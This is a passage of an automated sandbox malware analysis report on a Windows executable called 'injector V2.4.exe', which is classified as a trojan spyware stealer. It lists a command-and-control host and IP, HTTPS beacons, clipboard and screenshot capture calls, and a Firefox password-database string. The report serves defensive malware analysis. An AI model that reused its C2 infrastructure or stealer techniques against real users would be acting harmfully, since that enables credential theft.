            Source: injector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fumblingactor.cyou/3
            Source: injector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fumblingactor.cyou/K
            Source: injector V2.4.exe, 00000004.00000002.2254512158.00000000004C9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2254099466.0000000000545000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2152542985.0000000004EF3000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fumblingactor.cyou/api
            Source: injector V2.4.exe, 00000004.00000003.2254099466.0000000000545000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fumblingactor.cyou/api;
            Source: injector V2.4.exe, 00000004.00000003.2241600983.0000000000544000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fumblingactor.cyou/apiM
            Source: injector V2.4.exe, 00000004.00000003.2175491953.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fumblingactor.cyou/apiY
            Source: injector V2.4.exe, 00000004.00000003.2253728589.00000000004C9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2254512158.00000000004C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fumblingactor.cyou/apig
            Source: injector V2.4.exe, 00000004.00000003.2150145038.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2147305126.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2145295992.0000000004EDA000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2152542985.0000000004EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fumblingactor.cyou/apik
            Source: injector V2.4.exe, 00000004.00000003.2253728589.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2254512158.00000000004B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fumblingactor.cyou/apiq
            Source: injector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fumblingactor.cyou/s
            Source: injector V2.4.exe, injector V2.4.exe, 00000004.00000002.2254882908.0000000000536000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2203550234.000000000052F000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2182688181.0000000000533000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2241509455.0000000000533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fumblingactor.cyou:443/api
            Source: injector V2.4.exe, 00000004.00000002.2254923759.0000000000545000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2254099466.0000000000545000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fumblingactor.cyou:443/apiTlZT
            Source: injector V2.4.exe, 00000004.00000003.2241509455.0000000000533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fumblingactor.cyou:443/apiicrosoft
            Source: injector V2.4.exe, 00000004.00000003.2153081983.0000000004EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
            Source: injector V2.4.exeString found in binary or memory: https://sectigo.com/CPS0
            Source: injector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: injector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: injector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
            Source: injector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
            Source: injector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: injector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: injector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
            Source: injector V2.4.exe, 00000004.00000003.2152633230.000000000518D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49716 version: TLS 1.2
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00434830 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_00434830
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00434830 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_00434830
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00434A10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,4_2_00434A10
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B3D4A00_2_00B3D4A0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B44CD00_2_00B44CD0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B46CD00_2_00B46CD0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B34CC00_2_00B34CC0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B468000_2_00B46800
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B334400_2_00B33440
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B478400_2_00B47840
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B355F00_2_00B355F0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B259300_2_00B25930
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B41D300_2_00B41D30
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B381290_2_00B38129
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B349100_2_00B34910
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B3DD000_2_00B3DD00
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B441700_2_00B44170
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B2B9640_2_00B2B964
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B32AE70_2_00B32AE7
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B55E220_2_00B55E22
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B39B800_2_00B39B80
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B33F800_2_00B33F80
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B363300_2_00B36330
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B473300_2_00B47330
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B35F600_2_00B35F60
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B413670_2_00B41367
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B2A36B0_2_00B2A36B
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B37F540_2_00B37F54
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B3F3400_2_00B3F340
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B3C0A03_2_00B3C0A0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B210003_2_00B21000
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B468003_2_00B46800
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B478403_2_00B47840
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B301903_2_00B30190
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B2A1803_2_00B2A180
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B259303_2_00B25930
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B349103_2_00B34910
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B441703_2_00B44170
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B32AA03_2_00B32AA0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B39B803_2_00B39B80
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B37BD03_2_00B37BD0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B363303_2_00B36330
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B473303_2_00B47330
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B3F3403_2_00B3F340
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B3D4A03_2_00B3D4A0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B44CD03_2_00B44CD0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B46CD03_2_00B46CD0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B2CCC03_2_00B2CCC0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B34CC03_2_00B34CC0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B334403_2_00B33440
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B355F03_2_00B355F0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B255403_2_00B25540
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B55E223_2_00B55E22
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B3DE703_2_00B3DE70
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B23E603_2_00B23E60
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B33F803_2_00B33F80
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B35F603_2_00B35F60
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004239204_2_00423920
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004391304_2_00439130
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004214004_2_00421400
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041941E4_2_0041941E
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004394C04_2_004394C0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042E5734_2_0042E573
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0043BD004_2_0043BD00
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00408D804_2_00408D80
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004256554_2_00425655
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004416204_2_00441620
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0040CE254_2_0040CE25
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0040DE2F4_2_0040DE2F
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042EED94_2_0042EED9
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004286904_2_00428690
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00441EA04_2_00441EA0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041B87A4_2_0041B87A
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004028204_2_00402820
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042A8204_2_0042A820
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004298284_2_00429828
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041C03D4_2_0041C03D
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041F0CA4_2_0041F0CA
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004418D04_2_004418D0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004050954_2_00405095
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004388A04_2_004388A0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0043A1704_2_0043A170
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041D1D04_2_0041D1D0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042E9864_2_0042E986
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004329904_2_00432990
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004269B14_2_004269B1
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042A24C4_2_0042A24C
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00407A504_2_00407A50
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00424A6F4_2_00424A6F
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004292304_2_00429230
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004272DE4_2_004272DE
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042DAF94_2_0042DAF9
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042A2994_2_0042A299
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042B2A14_2_0042B2A1
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00406AB04_2_00406AB0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00437B534_2_00437B53
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00438B004_2_00438B00
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041AB134_2_0041AB13
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00428B204_2_00428B20
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041E3304_2_0041E330
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00402BD04_2_00402BD0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004063E04_2_004063E0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00409B904_2_00409B90
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00441BB04_2_00441BB0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041A45E4_2_0041A45E
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00439C604_2_00439C60
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0043C4604_2_0043C460
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0043CC704_2_0043CC70
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004204004_2_00420400
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004344204_2_00434420
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004404204_2_00440420
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004244304_2_00424430
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042A4D04_2_0042A4D0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042F54D4_2_0042F54D
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004272DE4_2_004272DE
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004035E04_2_004035E0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004295E44_2_004295E4
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042B5F04_2_0042B5F0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00404D854_2_00404D85
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0040B5BC4_2_0040B5BC
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042A6434_2_0042A643
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00427E474_2_00427E47
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041FE604_2_0041FE60
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042DE024_2_0042DE02
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004096C04_2_004096C0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00421ECE4_2_00421ECE
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00430ED94_2_00430ED9
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00405E904_2_00405E90
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0042DE924_2_0042DE92
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00418EB04_2_00418EB0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00406F404_2_00406F40
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0040AF504_2_0040AF50
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00403FD04_2_00403FD0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041F7B04_2_0041F7B0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: String function: 00418EA0 appears 73 times
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: String function: 00B4CAF8 appears 35 times
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: String function: 00B49890 appears 63 times
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: String function: 00408620 appears 41 times
            Source: injector V2.4.exeStatic PE information: invalid certificate
            Source: injector V2.4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: injector V2.4.exeStatic PE information: Section: .coS ZLIB complexity 1.0003350020226538
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/0@1/1
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_004394C0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,4_2_004394C0
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_03
            Source: injector V2.4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\injector V2.4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: injector V2.4.exe, 00000004.00000003.2102318883.0000000004E86000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102563242.0000000004E6B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2123788474.0000000004F02000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2123574593.0000000004E6D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: injector V2.4.exeReversingLabs: Detection: 34%
            Source: C:\Users\user\Desktop\injector V2.4.exeFile read: C:\Users\user\Desktop\injector V2.4.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"
            Source: C:\Users\user\Desktop\injector V2.4.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\injector V2.4.exeProcess created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"
            Source: C:\Users\user\Desktop\injector V2.4.exeProcess created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"
            Source: C:\Users\user\Desktop\injector V2.4.exeProcess created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"Jump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeProcess created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"Jump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: injector V2.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: injector V2.4.exeStatic PE information: section name: .00cfg
            Source: injector V2.4.exeStatic PE information: section name: .coS
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B500FA push ecx; ret 0_2_00B5010D
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B500FA push ecx; ret 3_2_00B5010D
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_0054164C push ebp; ret 4_3_00541650
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_0054164C push ebp; ret 4_3_00541650
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00535C19 push eax; retf 0002h4_3_00535C1A
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00535C19 push eax; retf 0002h4_3_00535C1A
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00535C19 push eax; retf 0002h4_3_00535C1A
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00537401 push ebp; iretd 4_3_00537402
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00537401 push ebp; iretd 4_3_00537402
